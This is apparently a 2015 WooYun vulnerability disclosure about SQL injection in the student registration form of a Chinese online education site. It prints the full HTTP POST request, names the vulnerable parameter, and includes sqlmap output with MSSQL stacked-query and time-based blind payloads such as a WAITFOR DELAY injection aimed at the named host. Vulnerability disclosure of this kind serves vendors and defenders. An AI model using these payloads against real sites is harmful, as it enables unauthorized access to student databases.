当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126252

漏洞标题:中国现代远程与继续教育网SQL注入一枚

相关厂商:北京希普无忧教育科技有限公司

漏洞作者: 路人甲

提交时间:2015-07-13 11:45

修复时间:2015-08-28 14:42

公开时间:2015-08-28 14:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-13: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商已经确认,细节仅向厂商公开
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开

简要描述:

如题

详细说明:

在 网院考生入口 进行注册,输入完帐号信息后进入到下面页面
哦偶,没学号啊,注入试下咯

1.jpg


数据包

POST /student/login/RelateStudentInfo.aspx HTTP/1.1
Host: server1.cdce.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://server1.cdce.cn/student/login/RelateStudentInfo.aspx
Cookie: ASP.NET_SessionId=kgx2c5u13od1rq45qhq45wmd; AJSTAT_ok_pages=1; AJSTAT_ok_times=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 5973
__VIEWSTATE=%2FwEPDwUJODI4NDI4MzI0D2QWAgIDD2QWCAIDDxAPFgYeDURhdGFUZXh0RmllbGQFDU5ldFNjaG9vbE5hbWUeDkRhdGFWYWx1ZUZpZWxkBQtOZXRTY2hvb2xJRB4LXyFEYXRhQm91bmRnFgIeCm9ua2V5cHJlc3MFF1N1Ym1pdEtleUNsaWNrKCdidG5PSycpEBV4DS0t6K%2B36YCJ5oupLS0Y5a6J5b695bm%2F5pKt55S16KeG5aSn5a2mDOWMl%2BS6rOWkp%2BWtphjljJfkuqzlub%2Fmkq3nlLXop4blpKflraYY5YyX5Lqs6Iiq56m66Iiq5aSp5aSn5a2mEuWMl%2BS6rOS6pOmAmuWkp%2BWtphLljJfkuqznp5HmioDlpKflraYS5YyX5Lqs55CG5bel5aSn5a2mEuWMl%2BS6rOW4iOiMg%2BWkp%2BWtphXljJfkuqzlpJblm73or63lpKflraYS5YyX5Lqs6YKu55S15aSn5a2mEuWMl%2BS6rOivreiogOWkp%2BWtphXljJfkuqzkuK3ljLvoja%2FlpKflraYG5rWL6K%2BVB%2Ba1i%2BivlTIH5rWL6K%2BVMwzmtYvor5XnvZHpmaIY6ZW%2F5pil5bm%2F5pKt55S16KeG5aSn5a2mGOaIkOmDveW5v%2BaSreeUteinhuWkp%2BWtphjlpKfov57lub%2Fmkq3nlLXop4blpKflraYS5aSn6L%2Be55CG5bel5aSn5a2mEueUteWtkOenkeaKgOWkp%2BWtphLkuJzljJfotKLnu4%2FlpKflraYM5Lic5YyX5aSn5a2mEuS4nOWMl%2BWGnOS4muWkp%2BWtphLkuJzljJfluIjojIPlpKflraYM5Lic5Y2O5aSn5a2mDOS4nOWNl%2BWkp%2BWtphjlr7nlpJbnu4%2FmtY7otLjmmJPlpKflraYY56aP5bu65bm%2F5pKt55S16KeG5aSn5a2mEuemj%2BW7uuW4iOiMg%2BWkp%2BWtpgzlpI3ml6blpKflraYY55SY6IKD5bm%2F5pKt55S16KeG5aSn5a2mGOW5v%2BS4nOW5v%2BaSreeUteinhuWkp%2BWtpiflub%2Fopb%2Flo67ml4%2Foh6rmsrvljLrlub%2Fmkq3nlLXop4blpKflraYY5bm%2F5bee5bm%2F5pKt55S16KeG5aSn5a2mGOi0teW3nuW5v%2BaSreeUteinhuWkp%2BWtphXlk4jlsJTmu6jlt6XkuJrlpKflraYb5ZOI5bCU5ruo5bm%2F5pKt55S16KeG5aSn5a2mGOa1t%2BWNl%2BW5v%2BaSreeUteinhuWkp%2BWtphjmsrPljJflub%2Fmkq3nlLXop4blpKflraYY5rKz5Y2X5bm%2F5pKt55S16KeG5aSn5a2mG%2Bm7kem%2Bmeaxn%2BW5v%2BaSreeUteinhuWkp%2BWtphjmuZbljJflub%2Fmkq3nlLXop4blpKflraYY5rmW5Y2X5bm%2F5pKt55S16KeG5aSn5a2mEuWNjuS4nOeQhuW3peWkp%2BWtphLljY7kuJzluIjojIPlpKflraYS5Y2O5Y2X55CG5bel5aSn5a2mEuWNjuWNl%2BW4iOiMg%2BWkp%2BWtphLljY7kuK3np5HmioDlpKflraYS5Y2O5Lit5biI6IyD5aSn5a2mDOWQieael%2BWkp%2BWtphjlkInmnpflub%2Fmkq3nlLXop4blpKflraYM5rGf5Y2X5aSn5a2mGOaxn%2BiLj%2BW5v%2BaSreeUteinhuWkp%2BWtphjmsZ%2Fopb%2Flub%2Fmkq3nlLXop4blpKflraYM5YWw5bee5aSn5a2mGOi%2BveWugeW5v%2BaSreeUteinhuWkp%2BWtpiTlhoXokpnlj6Toh6rmsrvljLrlub%2Fmkq3nlLXop4blpKflraYM5Y2X5Lqs5aSn5a2mGOWNl%2BS6rOW5v%2BaSreeUteinhuWkp%2BWtpgzljZflvIDlpKflraYY5a6B5rOi5bm%2F5pKt55S16KeG5aSn5a2mJ%2BWugeWkj%2BWbnuaXj%2BiHquayu%2BWMuuW5v%2BaSreeUteinhuWkp%2BWtphjpnZLlspvlub%2Fmkq3nlLXop4blpKflraYY6Z2S5rW35bm%2F5pKt55S16KeG5aSn5a2mDOa4heWNjuWkp%2BWtpgzlsbHkuJzlpKflraYY5bGx5Lic5bm%2F5pKt55S16KeG5aSn5a2mGOWxseilv%2BW5v%2BaSreeUteinhuWkp%2BWtphjpmZXopb%2Flub%2Fmkq3nlLXop4blpKflraYS6ZmV6KW%2F5biI6IyD5aSn5a2mGOS4iua1t%2BesrOS6jOWMu%2BenkeWkp%2BWtphjkuIrmtbflub%2Fmkq3nlLXop4blpKflraYS5LiK5rW35Lqk6YCa5aSn5a2mFeS4iua1t%2BWkluWbveivreWkp%2BWtphjmt7HlnLPlub%2Fmkq3nlLXop4blpKflraYY5rKI6Ziz5bm%2F5pKt55S16KeG5aSn5a2mDOWbm%2BW3neWkp%2BWtphjlm5vlt53lub%2Fmkq3nlLXop4blpKflraYS5Zub5bed5Yac5Lia5aSn5a2mDOWkqea0peWkp%2BWtphjlpKnmtKXlub%2Fmkq3nlLXop4blpKflraYM5ZCM5rWO5aSn5a2mDOaXoOW%2Fp%2BWtpumZogzmrabmsYnlpKflraYY5q2m5rGJ5bm%2F5pKt55S16KeG5aSn5a2mEuatpuaxieeQhuW3peWkp%2BWtphjopb%2FlronnlLXlrZDnp5HmioDlpKflraYY6KW%2F5a6J5bm%2F5pKt55S16KeG5aSn5a2mEuilv%2BWuieS6pOmAmuWkp%2BWtphLopb%2FljJflt6XkuJrlpKflraYS6KW%2F5Y2X6LSi57uP5aSn5a2mDOilv%2BWNl%2BWkp%2BWtphLopb%2FljZfkuqTpgJrlpKflraYS6KW%2F5Y2X56eR5oqA5aSn5a2mDOWOpumXqOWkp%2BWtphjljqbpl6jlub%2Fmkq3nlLXop4blpKflraYq5paw55aG55Sf5Lqn5bu66K6%2B5YW15Zui5bm%2F5pKt55S16KeG5aSn5a2mKuaWsOeWhue7tOWQvuWwlOiHquayu%2BWMuuW5v%2BaSreeUteinhuWkp%2BWtphjkupHljZflub%2Fmkq3nlLXop4blpKflraYM5rWZ5rGf5aSn5a2mGOa1meaxn%2BW5v%2BaSreeUteinhuWkp%2BWtpgzpg5Hlt57lpKflraYS5Lit5Zu95Lyg5aqS5aSn5a2mEuS4reWbveWcsOi0qOWkp%2BWtphrkuK3lm73lnLDotKjlpKflraYo5YyX5LqsKRjkuK3lm73np5HlrabmioDmnK%2FlpKflraYS5Lit5Zu95Yac5Lia5aSn5a2mEuS4reWbveS6uuawkeWkp%2BWtphrkuK3lm73nn7PmsrnlpKflraYo5YyX5LqsKR7kuK3lm73nn7PmsrnlpKflrabvvIjljY7kuJzvvIkS5Lit5Zu95Yy756eR5aSn5a2mDOS4reWNl%2BWkp%2BWtpgzkuK3lsbHlpKflraYM5Lit5aSu55S15aSnGOS4reWkruW5v%2BaSreeUteinhuWkp%2BWtphLkuK3lpK7pn7PkuZDlrabpmaIM6YeN5bqG5aSn5a2mGOmHjeW6huW5v%2BaSreeUteinhuWkp%2BWtphV4ATADMTE3Ajg5AjgzAjc1AzExOAIxOAIxNgI2NgIxNwI4NgE4AjI1AzEzNAMxMzcDMTM4AzEzMAMxMTECNzQDMTI0AjEzAjU3AjEyAjQwAjg3AzEwMQI1NgIyMAI2MwMxMjECNTkCNjADMTE1Ajg1AzEwNwI3OAMxMjMCMzcDMTAwAzEzMwMxMjADMTAzAzEwNQI3NwI5OAIxOQIyNAIzOAI2MQIxNQEzAjM5Ajk2Ajg4AzEwNAMxMjYCODACNjcCOTcCMjcCOTUCMjICOTQDMTA5AzExNgMxMjgCMzQCNDkDMTE5AzEyMgI3MgIzNQI1NAI3NgI1MAI0NwMxMTQCNjIDMTI5AjcwAjE0AjkzAjk5AjgxAzEzMQIyMQI2OQI1OAI0NgI2NAE5AjkwAjc5AzEzMgE2ATcDMTM1AzEyNQMxMDIDMTEwAzEwOAI1NQI3MQI5MgI1MgIzMQMxMjcCODICNTECNTMDMTM2AjQ4AjExAjczAjMzAzEzOQI2NQIzMgI0MQMxMDYUKwN4Z2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCBw8PZBYCHwMFF1N1Ym1pdEtleUNsaWNrKCdidG5PSycpZAIJDw9kFgIfAwUXU3VibWl0S2V5Q2xpY2soJ2J0bk9LJylkAgsPD2QWAh8DBRdTdWJtaXRLZXlDbGljaygnYnRuT0snKWRk%2BkdlGZ001Ezd9H5koRgx91bT9Q8%3D&__VIEWSTATEGENERATOR=E942AD35&__EVENTVALIDATION=%2FwEWgAEChbLvlgECjOeKxgYCvsz00QkCyK2E8QcCtszY0QkCtsyA0gkCp8yI0gkC%2F8fErw8CoczU0QkCocyM0gkCpMyM0gkCocyQ0gkCtsyM0gkCtsz00QkCoMyI0gkCu%2FCmsQECyK2M8QcC%2F8fMrw8Ch43fhQ4C6rT5cAKnzITSCQK78KKxAQKhzIDSCQKlzJDSCQKhzLzSCQKizLTSCQK2zJDSCQLqtPVwAqXMjNIJAqDMtNIJAqTMgNIJAuq0%2FXACpczY0QkCpMy00gkCnp%2FAmwsCtsyI0gkCyK2A8QcCp8zU0QkC1MqAxgwCo8yQ0gkCh43ThQ4C1MqExgwCh43bhQ4C1Mq4xgwCnp%2F8mwsCp8yQ0gkCuczU0QkCoczY0QkCoMyE0gkCo8zU0QkCpMy40gkCocyI0gkCo8z00QkCo8zY0QkCucyM0gkCtszU0QkCu%2FDasAEC5Ybmhg0Ctsy00gkCpMyQ0gkCucyQ0gkCoMyQ0gkCucyI0gkCoMy80gkCucyE0gkCwu7imgEC5Ybihg0C%2F8fIrw8Co8yE0gkCoszY0QkCwu7mmgEC8aOf2woCp8y80gkCo8yI0gkCpcyE0gkCp8yM0gkCpcy00gkCosyQ0gkCu%2FDesAECpMy80gkCwu7qmgECp8y00gkCocyE0gkCucyA0gkCuczY0QkCtsy40gkC6rTBcAKgzLjSCQKkzNjRCQKlzNTRCQKizIzSCQKkzITSCQK5zPTRCQK5zLTSCQKnzNjRCQLxo%2BPbCgKkzPTRCQKnzPTRCQKen8ibCwKen8SbCwLxo5fbCgKHjdeFDgL%2Fx8CvDwKlzIjSCQKnzLjSCQK5zLzSCQKlzLzSCQKjzLjSCQLIrYjxBwK2zLzSCQKlzLjSCQKlzIDSCQLlhuqGDQKizNTRCQKhzLjSCQKnzIDSCQKjzIDSCQLC7u6aAQKkzIjSCQKjzLzSCQKizLjSCQLlhp6GDQK%2BmcmVDALO5KbQDgLEruwcApjZhZcGAoX4mYcLAt2SmY8BVdgIpfg3EAksvm2FbGm3s3yHryE%3D&dropNetSchool=89&hid=aa&txtStudentNumber=2008601001&txtStudentCrtificateNumber=2008601001*&txtCheckCode=x433&btnOK=%C8%B7+%B6%A8


参数txtStudentCrtificateNumber可注入

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUJODI4NDI4MzI0D2QWAgIDD2QWCAIDDxAPFgYeDURhdGFUZXh0RmllbGQFDU5ldFNjaG9vbE5hbWUeD
kRhdGFWYWx1ZUZpZWxkBQtOZXRTY2hvb2xJRB4LXyFEYXRhQm91bmRnFgIeCm9ua2V5cHJlc3MFF1N1Ym1pdEtleUNsaWNrKCdidG5PSycpEBV
4DS0t6K+36YCJ5oupLS0Y5a6J5b695bm/5pKt55S16KeG5aSn5a2mDOWMl+S6rOWkp+WtphjljJfkuqzlub/mkq3nlLXop4blpKflraYY5YyX5
Lqs6Iiq56m66Iiq5aSp5aSn5a2mEuWMl+S6rOS6pOmAmuWkp+WtphLljJfkuqznp5HmioDlpKflraYS5YyX5Lqs55CG5bel5aSn5a2mEuWMl+S
6rOW4iOiMg+Wkp+WtphXljJfkuqzlpJblm73or63lpKflraYS5YyX5Lqs6YKu55S15aSn5a2mEuWMl+S6rOivreiogOWkp+WtphXljJfkuqzku
K3ljLvoja/lpKflraYG5rWL6K+VB+a1i+ivlTIH5rWL6K+VMwzmtYvor5XnvZHpmaIY6ZW/5pil5bm/5pKt55S16KeG5aSn5a2mGOaIkOmDveW
5v+aSreeUteinhuWkp+WtphjlpKfov57lub/mkq3nlLXop4blpKflraYS5aSn6L+e55CG5bel5aSn5a2mEueUteWtkOenkeaKgOWkp+WtphLku
JzljJfotKLnu4/lpKflraYM5Lic5YyX5aSn5a2mEuS4nOWMl+WGnOS4muWkp+WtphLkuJzljJfluIjojIPlpKflraYM5Lic5Y2O5aSn5a2mDOS
4nOWNl+Wkp+Wtphjlr7nlpJbnu4/mtY7otLjmmJPlpKflraYY56aP5bu65bm/5pKt55S16KeG5aSn5a2mEuemj+W7uuW4iOiMg+Wkp+Wtpgzlp
I3ml6blpKflraYY55SY6IKD5bm/5pKt55S16KeG5aSn5a2mGOW5v+S4nOW5v+aSreeUteinhuWkp+Wtpiflub/opb/lo67ml4/oh6rmsrvljLr
lub/mkq3nlLXop4blpKflraYY5bm/5bee5bm/5pKt55S16KeG5aSn5a2mGOi0teW3nuW5v+aSreeUteinhuWkp+WtphXlk4jlsJTmu6jlt6Xku
JrlpKflraYb5ZOI5bCU5ruo5bm/5pKt55S16KeG5aSn5a2mGOa1t+WNl+W5v+aSreeUteinhuWkp+WtphjmsrPljJflub/mkq3nlLXop4blpKf
lraYY5rKz5Y2X5bm/5pKt55S16KeG5aSn5a2mG+m7kem+meaxn+W5v+aSreeUteinhuWkp+WtphjmuZbljJflub/mkq3nlLXop4blpKflraYY5
rmW5Y2X5bm/5pKt55S16KeG5aSn5a2mEuWNjuS4nOeQhuW3peWkp+WtphLljY7kuJzluIjojIPlpKflraYS5Y2O5Y2X55CG5bel5aSn5a2mEuW
NjuWNl+W4iOiMg+Wkp+WtphLljY7kuK3np5HmioDlpKflraYS5Y2O5Lit5biI6IyD5aSn5a2mDOWQieael+Wkp+WtphjlkInmnpflub/mkq3nl
LXop4blpKflraYM5rGf5Y2X5aSn5a2mGOaxn+iLj+W5v+aSreeUteinhuWkp+WtphjmsZ/opb/lub/mkq3nlLXop4blpKflraYM5YWw5bee5aS
n5a2mGOi+veWugeW5v+aSreeUteinhuWkp+WtpiTlhoXokpnlj6Toh6rmsrvljLrlub/mkq3nlLXop4blpKflraYM5Y2X5Lqs5aSn5a2mGOWNl
+S6rOW5v+aSreeUteinhuWkp+WtpgzljZflvIDlpKflraYY5a6B5rOi5bm/5pKt55S16KeG5aSn5a2mJ+WugeWkj+WbnuaXj+iHquayu+WMuuW
5v+aSreeUteinhuWkp+WtphjpnZLlspvlub/mkq3nlLXop4blpKflraYY6Z2S5rW35bm/5pKt55S16KeG5aSn5a2mDOa4heWNjuWkp+Wtpgzls
bHkuJzlpKflraYY5bGx5Lic5bm/5pKt55S16KeG5aSn5a2mGOWxseilv+W5v+aSreeUteinhuWkp+WtphjpmZXopb/lub/mkq3nlLXop4blpKf
lraYS6ZmV6KW/5biI6IyD5aSn5a2mGOS4iua1t+esrOS6jOWMu+enkeWkp+WtphjkuIrmtbflub/mkq3nlLXop4blpKflraYS5LiK5rW35Lqk6
YCa5aSn5a2mFeS4iua1t+WkluWbveivreWkp+Wtphjmt7HlnLPlub/mkq3nlLXop4blpKflraYY5rKI6Ziz5bm/5pKt55S16KeG5aSn5a2mDOW
bm+W3neWkp+Wtphjlm5vlt53lub/mkq3nlLXop4blpKflraYS5Zub5bed5Yac5Lia5aSn5a2mDOWkqea0peWkp+WtphjlpKnmtKXlub/mkq3nl
LXop4blpKflraYM5ZCM5rWO5aSn5a2mDOaXoOW/p+WtpumZogzmrabmsYnlpKflraYY5q2m5rGJ5bm/5pKt55S16KeG5aSn5a2mEuatpuaxiee
QhuW3peWkp+Wtphjopb/lronnlLXlrZDnp5HmioDlpKflraYY6KW/5a6J5bm/5pKt55S16KeG5aSn5a2mEuilv+WuieS6pOmAmuWkp+WtphLop
b/ljJflt6XkuJrlpKflraYS6KW/5Y2X6LSi57uP5aSn5a2mDOilv+WNl+Wkp+WtphLopb/ljZfkuqTpgJrlpKflraYS6KW/5Y2X56eR5oqA5aS
n5a2mDOWOpumXqOWkp+Wtphjljqbpl6jlub/mkq3nlLXop4blpKflraYq5paw55aG55Sf5Lqn5bu66K6+5YW15Zui5bm/5pKt55S16KeG5aSn5
a2mKuaWsOeWhue7tOWQvuWwlOiHquayu+WMuuW5v+aSreeUteinhuWkp+WtphjkupHljZflub/mkq3nlLXop4blpKflraYM5rWZ5rGf5aSn5a2
mGOa1meaxn+W5v+aSreeUteinhuWkp+Wtpgzpg5Hlt57lpKflraYS5Lit5Zu95Lyg5aqS5aSn5a2mEuS4reWbveWcsOi0qOWkp+WtphrkuK3lm
73lnLDotKjlpKflraYo5YyX5LqsKRjkuK3lm73np5HlrabmioDmnK/lpKflraYS5Lit5Zu95Yac5Lia5aSn5a2mEuS4reWbveS6uuawkeWkp+W
tphrkuK3lm73nn7PmsrnlpKflraYo5YyX5LqsKR7kuK3lm73nn7PmsrnlpKflrabvvIjljY7kuJzvvIkS5Lit5Zu95Yy756eR5aSn5a2mDOS4r
eWNl+Wkp+WtpgzkuK3lsbHlpKflraYM5Lit5aSu55S15aSnGOS4reWkruW5v+aSreeUteinhuWkp+WtphLkuK3lpK7pn7PkuZDlrabpmaIM6Ye
N5bqG5aSn5a2mGOmHjeW6huW5v+aSreeUteinhuWkp+WtphV4ATADMTE3Ajg5AjgzAjc1AzExOAIxOAIxNgI2NgIxNwI4NgE4AjI1AzEzNAMxM
zcDMTM4AzEzMAMxMTECNzQDMTI0AjEzAjU3AjEyAjQwAjg3AzEwMQI1NgIyMAI2MwMxMjECNTkCNjADMTE1Ajg1AzEwNwI3OAMxMjMCMzcDMTA
wAzEzMwMxMjADMTAzAzEwNQI3NwI5OAIxOQIyNAIzOAI2MQIxNQEzAjM5Ajk2Ajg4AzEwNAMxMjYCODACNjcCOTcCMjcCOTUCMjICOTQDMTA5A
zExNgMxMjgCMzQCNDkDMTE5AzEyMgI3MgIzNQI1NAI3NgI1MAI0NwMxMTQCNjIDMTI5AjcwAjE0AjkzAjk5AjgxAzEzMQIyMQI2OQI1OAI0NgI
2NAE5AjkwAjc5AzEzMgE2ATcDMTM1AzEyNQMxMDIDMTEwAzEwOAI1NQI3MQI5MgI1MgIzMQMxMjcCODICNTECNTMDMTM2AjQ4AjExAjczAjMzA
zEzOQI2NQIzMgI0MQMxMDYUKwN4Z2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2d
nZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCBw8PZBYCHwMFF1N1Ym1pdEtleUNsa
WNrKCdidG5PSycpZAIJDw9kFgIfAwUXU3VibWl0S2V5Q2xpY2soJ2J0bk9LJylkAgsPD2QWAh8DBRdTdWJtaXRLZXlDbGljaygnYnRuT0snKWR
k+kdlGZ001Ezd9H5koRgx91bT9Q8=&__VIEWSTATEGENERATOR=E942AD35&__EVENTVALIDATION=/wEWgAEChbLvlgECjOeKxgYCvsz00QkC
yK2E8QcCtszY0QkCtsyA0gkCp8yI0gkC/8fErw8CoczU0QkCocyM0gkCpMyM0gkCocyQ0gkCtsyM0gkCtsz00QkCoMyI0gkCu/CmsQECyK2M8Q
cC/8fMrw8Ch43fhQ4C6rT5cAKnzITSCQK78KKxAQKhzIDSCQKlzJDSCQKhzLzSCQKizLTSCQK2zJDSCQLqtPVwAqXMjNIJAqDMtNIJAqTMgNIJ
Auq0/XACpczY0QkCpMy00gkCnp/AmwsCtsyI0gkCyK2A8QcCp8zU0QkC1MqAxgwCo8yQ0gkCh43ThQ4C1MqExgwCh43bhQ4C1Mq4xgwCnp/8mw
sCp8yQ0gkCuczU0QkCoczY0QkCoMyE0gkCo8zU0QkCpMy40gkCocyI0gkCo8z00QkCo8zY0QkCucyM0gkCtszU0QkCu/DasAEC5Ybmhg0Ctsy0
0gkCpMyQ0gkCucyQ0gkCoMyQ0gkCucyI0gkCoMy80gkCucyE0gkCwu7imgEC5Ybihg0C/8fIrw8Co8yE0gkCoszY0QkCwu7mmgEC8aOf2woCp8
y80gkCo8yI0gkCpcyE0gkCp8yM0gkCpcy00gkCosyQ0gkCu/DesAECpMy80gkCwu7qmgECp8y00gkCocyE0gkCucyA0gkCuczY0QkCtsy40gkC
6rTBcAKgzLjSCQKkzNjRCQKlzNTRCQKizIzSCQKkzITSCQK5zPTRCQK5zLTSCQKnzNjRCQLxo+PbCgKkzPTRCQKnzPTRCQKen8ibCwKen8SbCw
Lxo5fbCgKHjdeFDgL/x8CvDwKlzIjSCQKnzLjSCQK5zLzSCQKlzLzSCQKjzLjSCQLIrYjxBwK2zLzSCQKlzLjSCQKlzIDSCQLlhuqGDQKizNTR
CQKhzLjSCQKnzIDSCQKjzIDSCQLC7u6aAQKkzIjSCQKjzLzSCQKizLjSCQLlhp6GDQK+mcmVDALO5KbQDgLEruwcApjZhZcGAoX4mYcLAt2SmY
8BVdgIpfg3EAksvm2FbGm3s3yHryE=&dropNetSchool=89&hid=aa&txtStudentNumber=2008601001&txtStudentCrtificateNumber=
2008601001'; WAITFOR DELAY '0:0:5'--&txtCheckCode=x433&btnOK=%C8%B7 %B6%A8
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUJODI4NDI4MzI0D2QWAgIDD2QWCAIDDxAPFgYeDURhdGFUZXh0RmllbGQFDU5ldFNjaG9vbE5hbWUeD
kRhdGFWYWx1ZUZpZWxkBQtOZXRTY2hvb2xJRB4LXyFEYXRhQm91bmRnFgIeCm9ua2V5cHJlc3MFF1N1Ym1pdEtleUNsaWNrKCdidG5PSycpEBV
4DS0t6K+36YCJ5oupLS0Y5a6J5b695bm/5pKt55S16KeG5aSn5a2mDOWMl+S6rOWkp+WtphjljJfkuqzlub/mkq3nlLXop4blpKflraYY5YyX5
Lqs6Iiq56m66Iiq5aSp5aSn5a2mEuWMl+S6rOS6pOmAmuWkp+WtphLljJfkuqznp5HmioDlpKflraYS5YyX5Lqs55CG5bel5aSn5a2mEuWMl+S
6rOW4iOiMg+Wkp+WtphXljJfkuqzlpJblm73or63lpKflraYS5YyX5Lqs6YKu55S15aSn5a2mEuWMl+S6rOivreiogOWkp+WtphXljJfkuqzku
K3ljLvoja/lpKflraYG5rWL6K+VB+a1i+ivlTIH5rWL6K+VMwzmtYvor5XnvZHpmaIY6ZW/5pil5bm/5pKt55S16KeG5aSn5a2mGOaIkOmDveW
5v+aSreeUteinhuWkp+WtphjlpKfov57lub/mkq3nlLXop4blpKflraYS5aSn6L+e55CG5bel5aSn5a2mEueUteWtkOenkeaKgOWkp+WtphLku
JzljJfotKLnu4/lpKflraYM5Lic5YyX5aSn5a2mEuS4nOWMl+WGnOS4muWkp+WtphLkuJzljJfluIjojIPlpKflraYM5Lic5Y2O5aSn5a2mDOS
4nOWNl+Wkp+Wtphjlr7nlpJbnu4/mtY7otLjmmJPlpKflraYY56aP5bu65bm/5pKt55S16KeG5aSn5a2mEuemj+W7uuW4iOiMg+Wkp+Wtpgzlp
I3ml6blpKflraYY55SY6IKD5bm/5pKt55S16KeG5aSn5a2mGOW5v+S4nOW5v+aSreeUteinhuWkp+Wtpiflub/opb/lo67ml4/oh6rmsrvljLr
lub/mkq3nlLXop4blpKflraYY5bm/5bee5bm/5pKt55S16KeG5aSn5a2mGOi0teW3nuW5v+aSreeUteinhuWkp+WtphXlk4jlsJTmu6jlt6Xku
JrlpKflraYb5ZOI5bCU5ruo5bm/5pKt55S16KeG5aSn5a2mGOa1t+WNl+W5v+aSreeUteinhuWkp+WtphjmsrPljJflub/mkq3nlLXop4blpKf
lraYY5rKz5Y2X5bm/5pKt55S16KeG5aSn5a2mG+m7kem+meaxn+W5v+aSreeUteinhuWkp+WtphjmuZbljJflub/mkq3nlLXop4blpKflraYY5
rmW5Y2X5bm/5pKt55S16KeG5aSn5a2mEuWNjuS4nOeQhuW3peWkp+WtphLljY7kuJzluIjojIPlpKflraYS5Y2O5Y2X55CG5bel5aSn5a2mEuW
NjuWNl+W4iOiMg+Wkp+WtphLljY7kuK3np5HmioDlpKflraYS5Y2O5Lit5biI6IyD5aSn5a2mDOWQieael+Wkp+WtphjlkInmnpflub/mkq3nl
LXop4blpKflraYM5rGf5Y2X5aSn5a2mGOaxn+iLj+W5v+aSreeUteinhuWkp+WtphjmsZ/opb/lub/mkq3nlLXop4blpKflraYM5YWw5bee5aS
n5a2mGOi+veWugeW5v+aSreeUteinhuWkp+WtpiTlhoXokpnlj6Toh6rmsrvljLrlub/mkq3nlLXop4blpKflraYM5Y2X5Lqs5aSn5a2mGOWNl
+S6rOW5v+aSreeUteinhuWkp+WtpgzljZflvIDlpKflraYY5a6B5rOi5bm/5pKt55S16KeG5aSn5a2mJ+WugeWkj+WbnuaXj+iHquayu+WMuuW
5v+aSreeUteinhuWkp+WtphjpnZLlspvlub/mkq3nlLXop4blpKflraYY6Z2S5rW35bm/5pKt55S16KeG5aSn5a2mDOa4heWNjuWkp+Wtpgzls
bHkuJzlpKflraYY5bGx5Lic5bm/5pKt55S16KeG5aSn5a2mGOWxseilv+W5v+aSreeUteinhuWkp+WtphjpmZXopb/lub/mkq3nlLXop4blpKf
lraYS6ZmV6KW/5biI6IyD5aSn5a2mGOS4iua1t+esrOS6jOWMu+enkeWkp+WtphjkuIrmtbflub/mkq3nlLXop4blpKflraYS5LiK5rW35Lqk6
YCa5aSn5a2mFeS4iua1t+WkluWbveivreWkp+Wtphjmt7HlnLPlub/mkq3nlLXop4blpKflraYY5rKI6Ziz5bm/5pKt55S16KeG5aSn5a2mDOW
bm+W3neWkp+Wtphjlm5vlt53lub/mkq3nlLXop4blpKflraYS5Zub5bed5Yac5Lia5aSn5a2mDOWkqea0peWkp+WtphjlpKnmtKXlub/mkq3nl
LXop4blpKflraYM5ZCM5rWO5aSn5a2mDOaXoOW/p+WtpumZogzmrabmsYnlpKflraYY5q2m5rGJ5bm/5pKt55S16KeG5aSn5a2mEuatpuaxiee
QhuW3peWkp+Wtphjopb/lronnlLXlrZDnp5HmioDlpKflraYY6KW/5a6J5bm/5pKt55S16KeG5aSn5a2mEuilv+WuieS6pOmAmuWkp+WtphLop
b/ljJflt6XkuJrlpKflraYS6KW/5Y2X6LSi57uP5aSn5a2mDOilv+WNl+Wkp+WtphLopb/ljZfkuqTpgJrlpKflraYS6KW/5Y2X56eR5oqA5aS
n5a2mDOWOpumXqOWkp+Wtphjljqbpl6jlub/mkq3nlLXop4blpKflraYq5paw55aG55Sf5Lqn5bu66K6+5YW15Zui5bm/5pKt55S16KeG5aSn5
a2mKuaWsOeWhue7tOWQvuWwlOiHquayu+WMuuW5v+aSreeUteinhuWkp+WtphjkupHljZflub/mkq3nlLXop4blpKflraYM5rWZ5rGf5aSn5a2
mGOa1meaxn+W5v+aSreeUteinhuWkp+Wtpgzpg5Hlt57lpKflraYS5Lit5Zu95Lyg5aqS5aSn5a2mEuS4reWbveWcsOi0qOWkp+WtphrkuK3lm
73lnLDotKjlpKflraYo5YyX5LqsKRjkuK3lm73np5HlrabmioDmnK/lpKflraYS5Lit5Zu95Yac5Lia5aSn5a2mEuS4reWbveS6uuawkeWkp+W
tphrkuK3lm73nn7PmsrnlpKflraYo5YyX5LqsKR7kuK3lm73nn7PmsrnlpKflrabvvIjljY7kuJzvvIkS5Lit5Zu95Yy756eR5aSn5a2mDOS4r
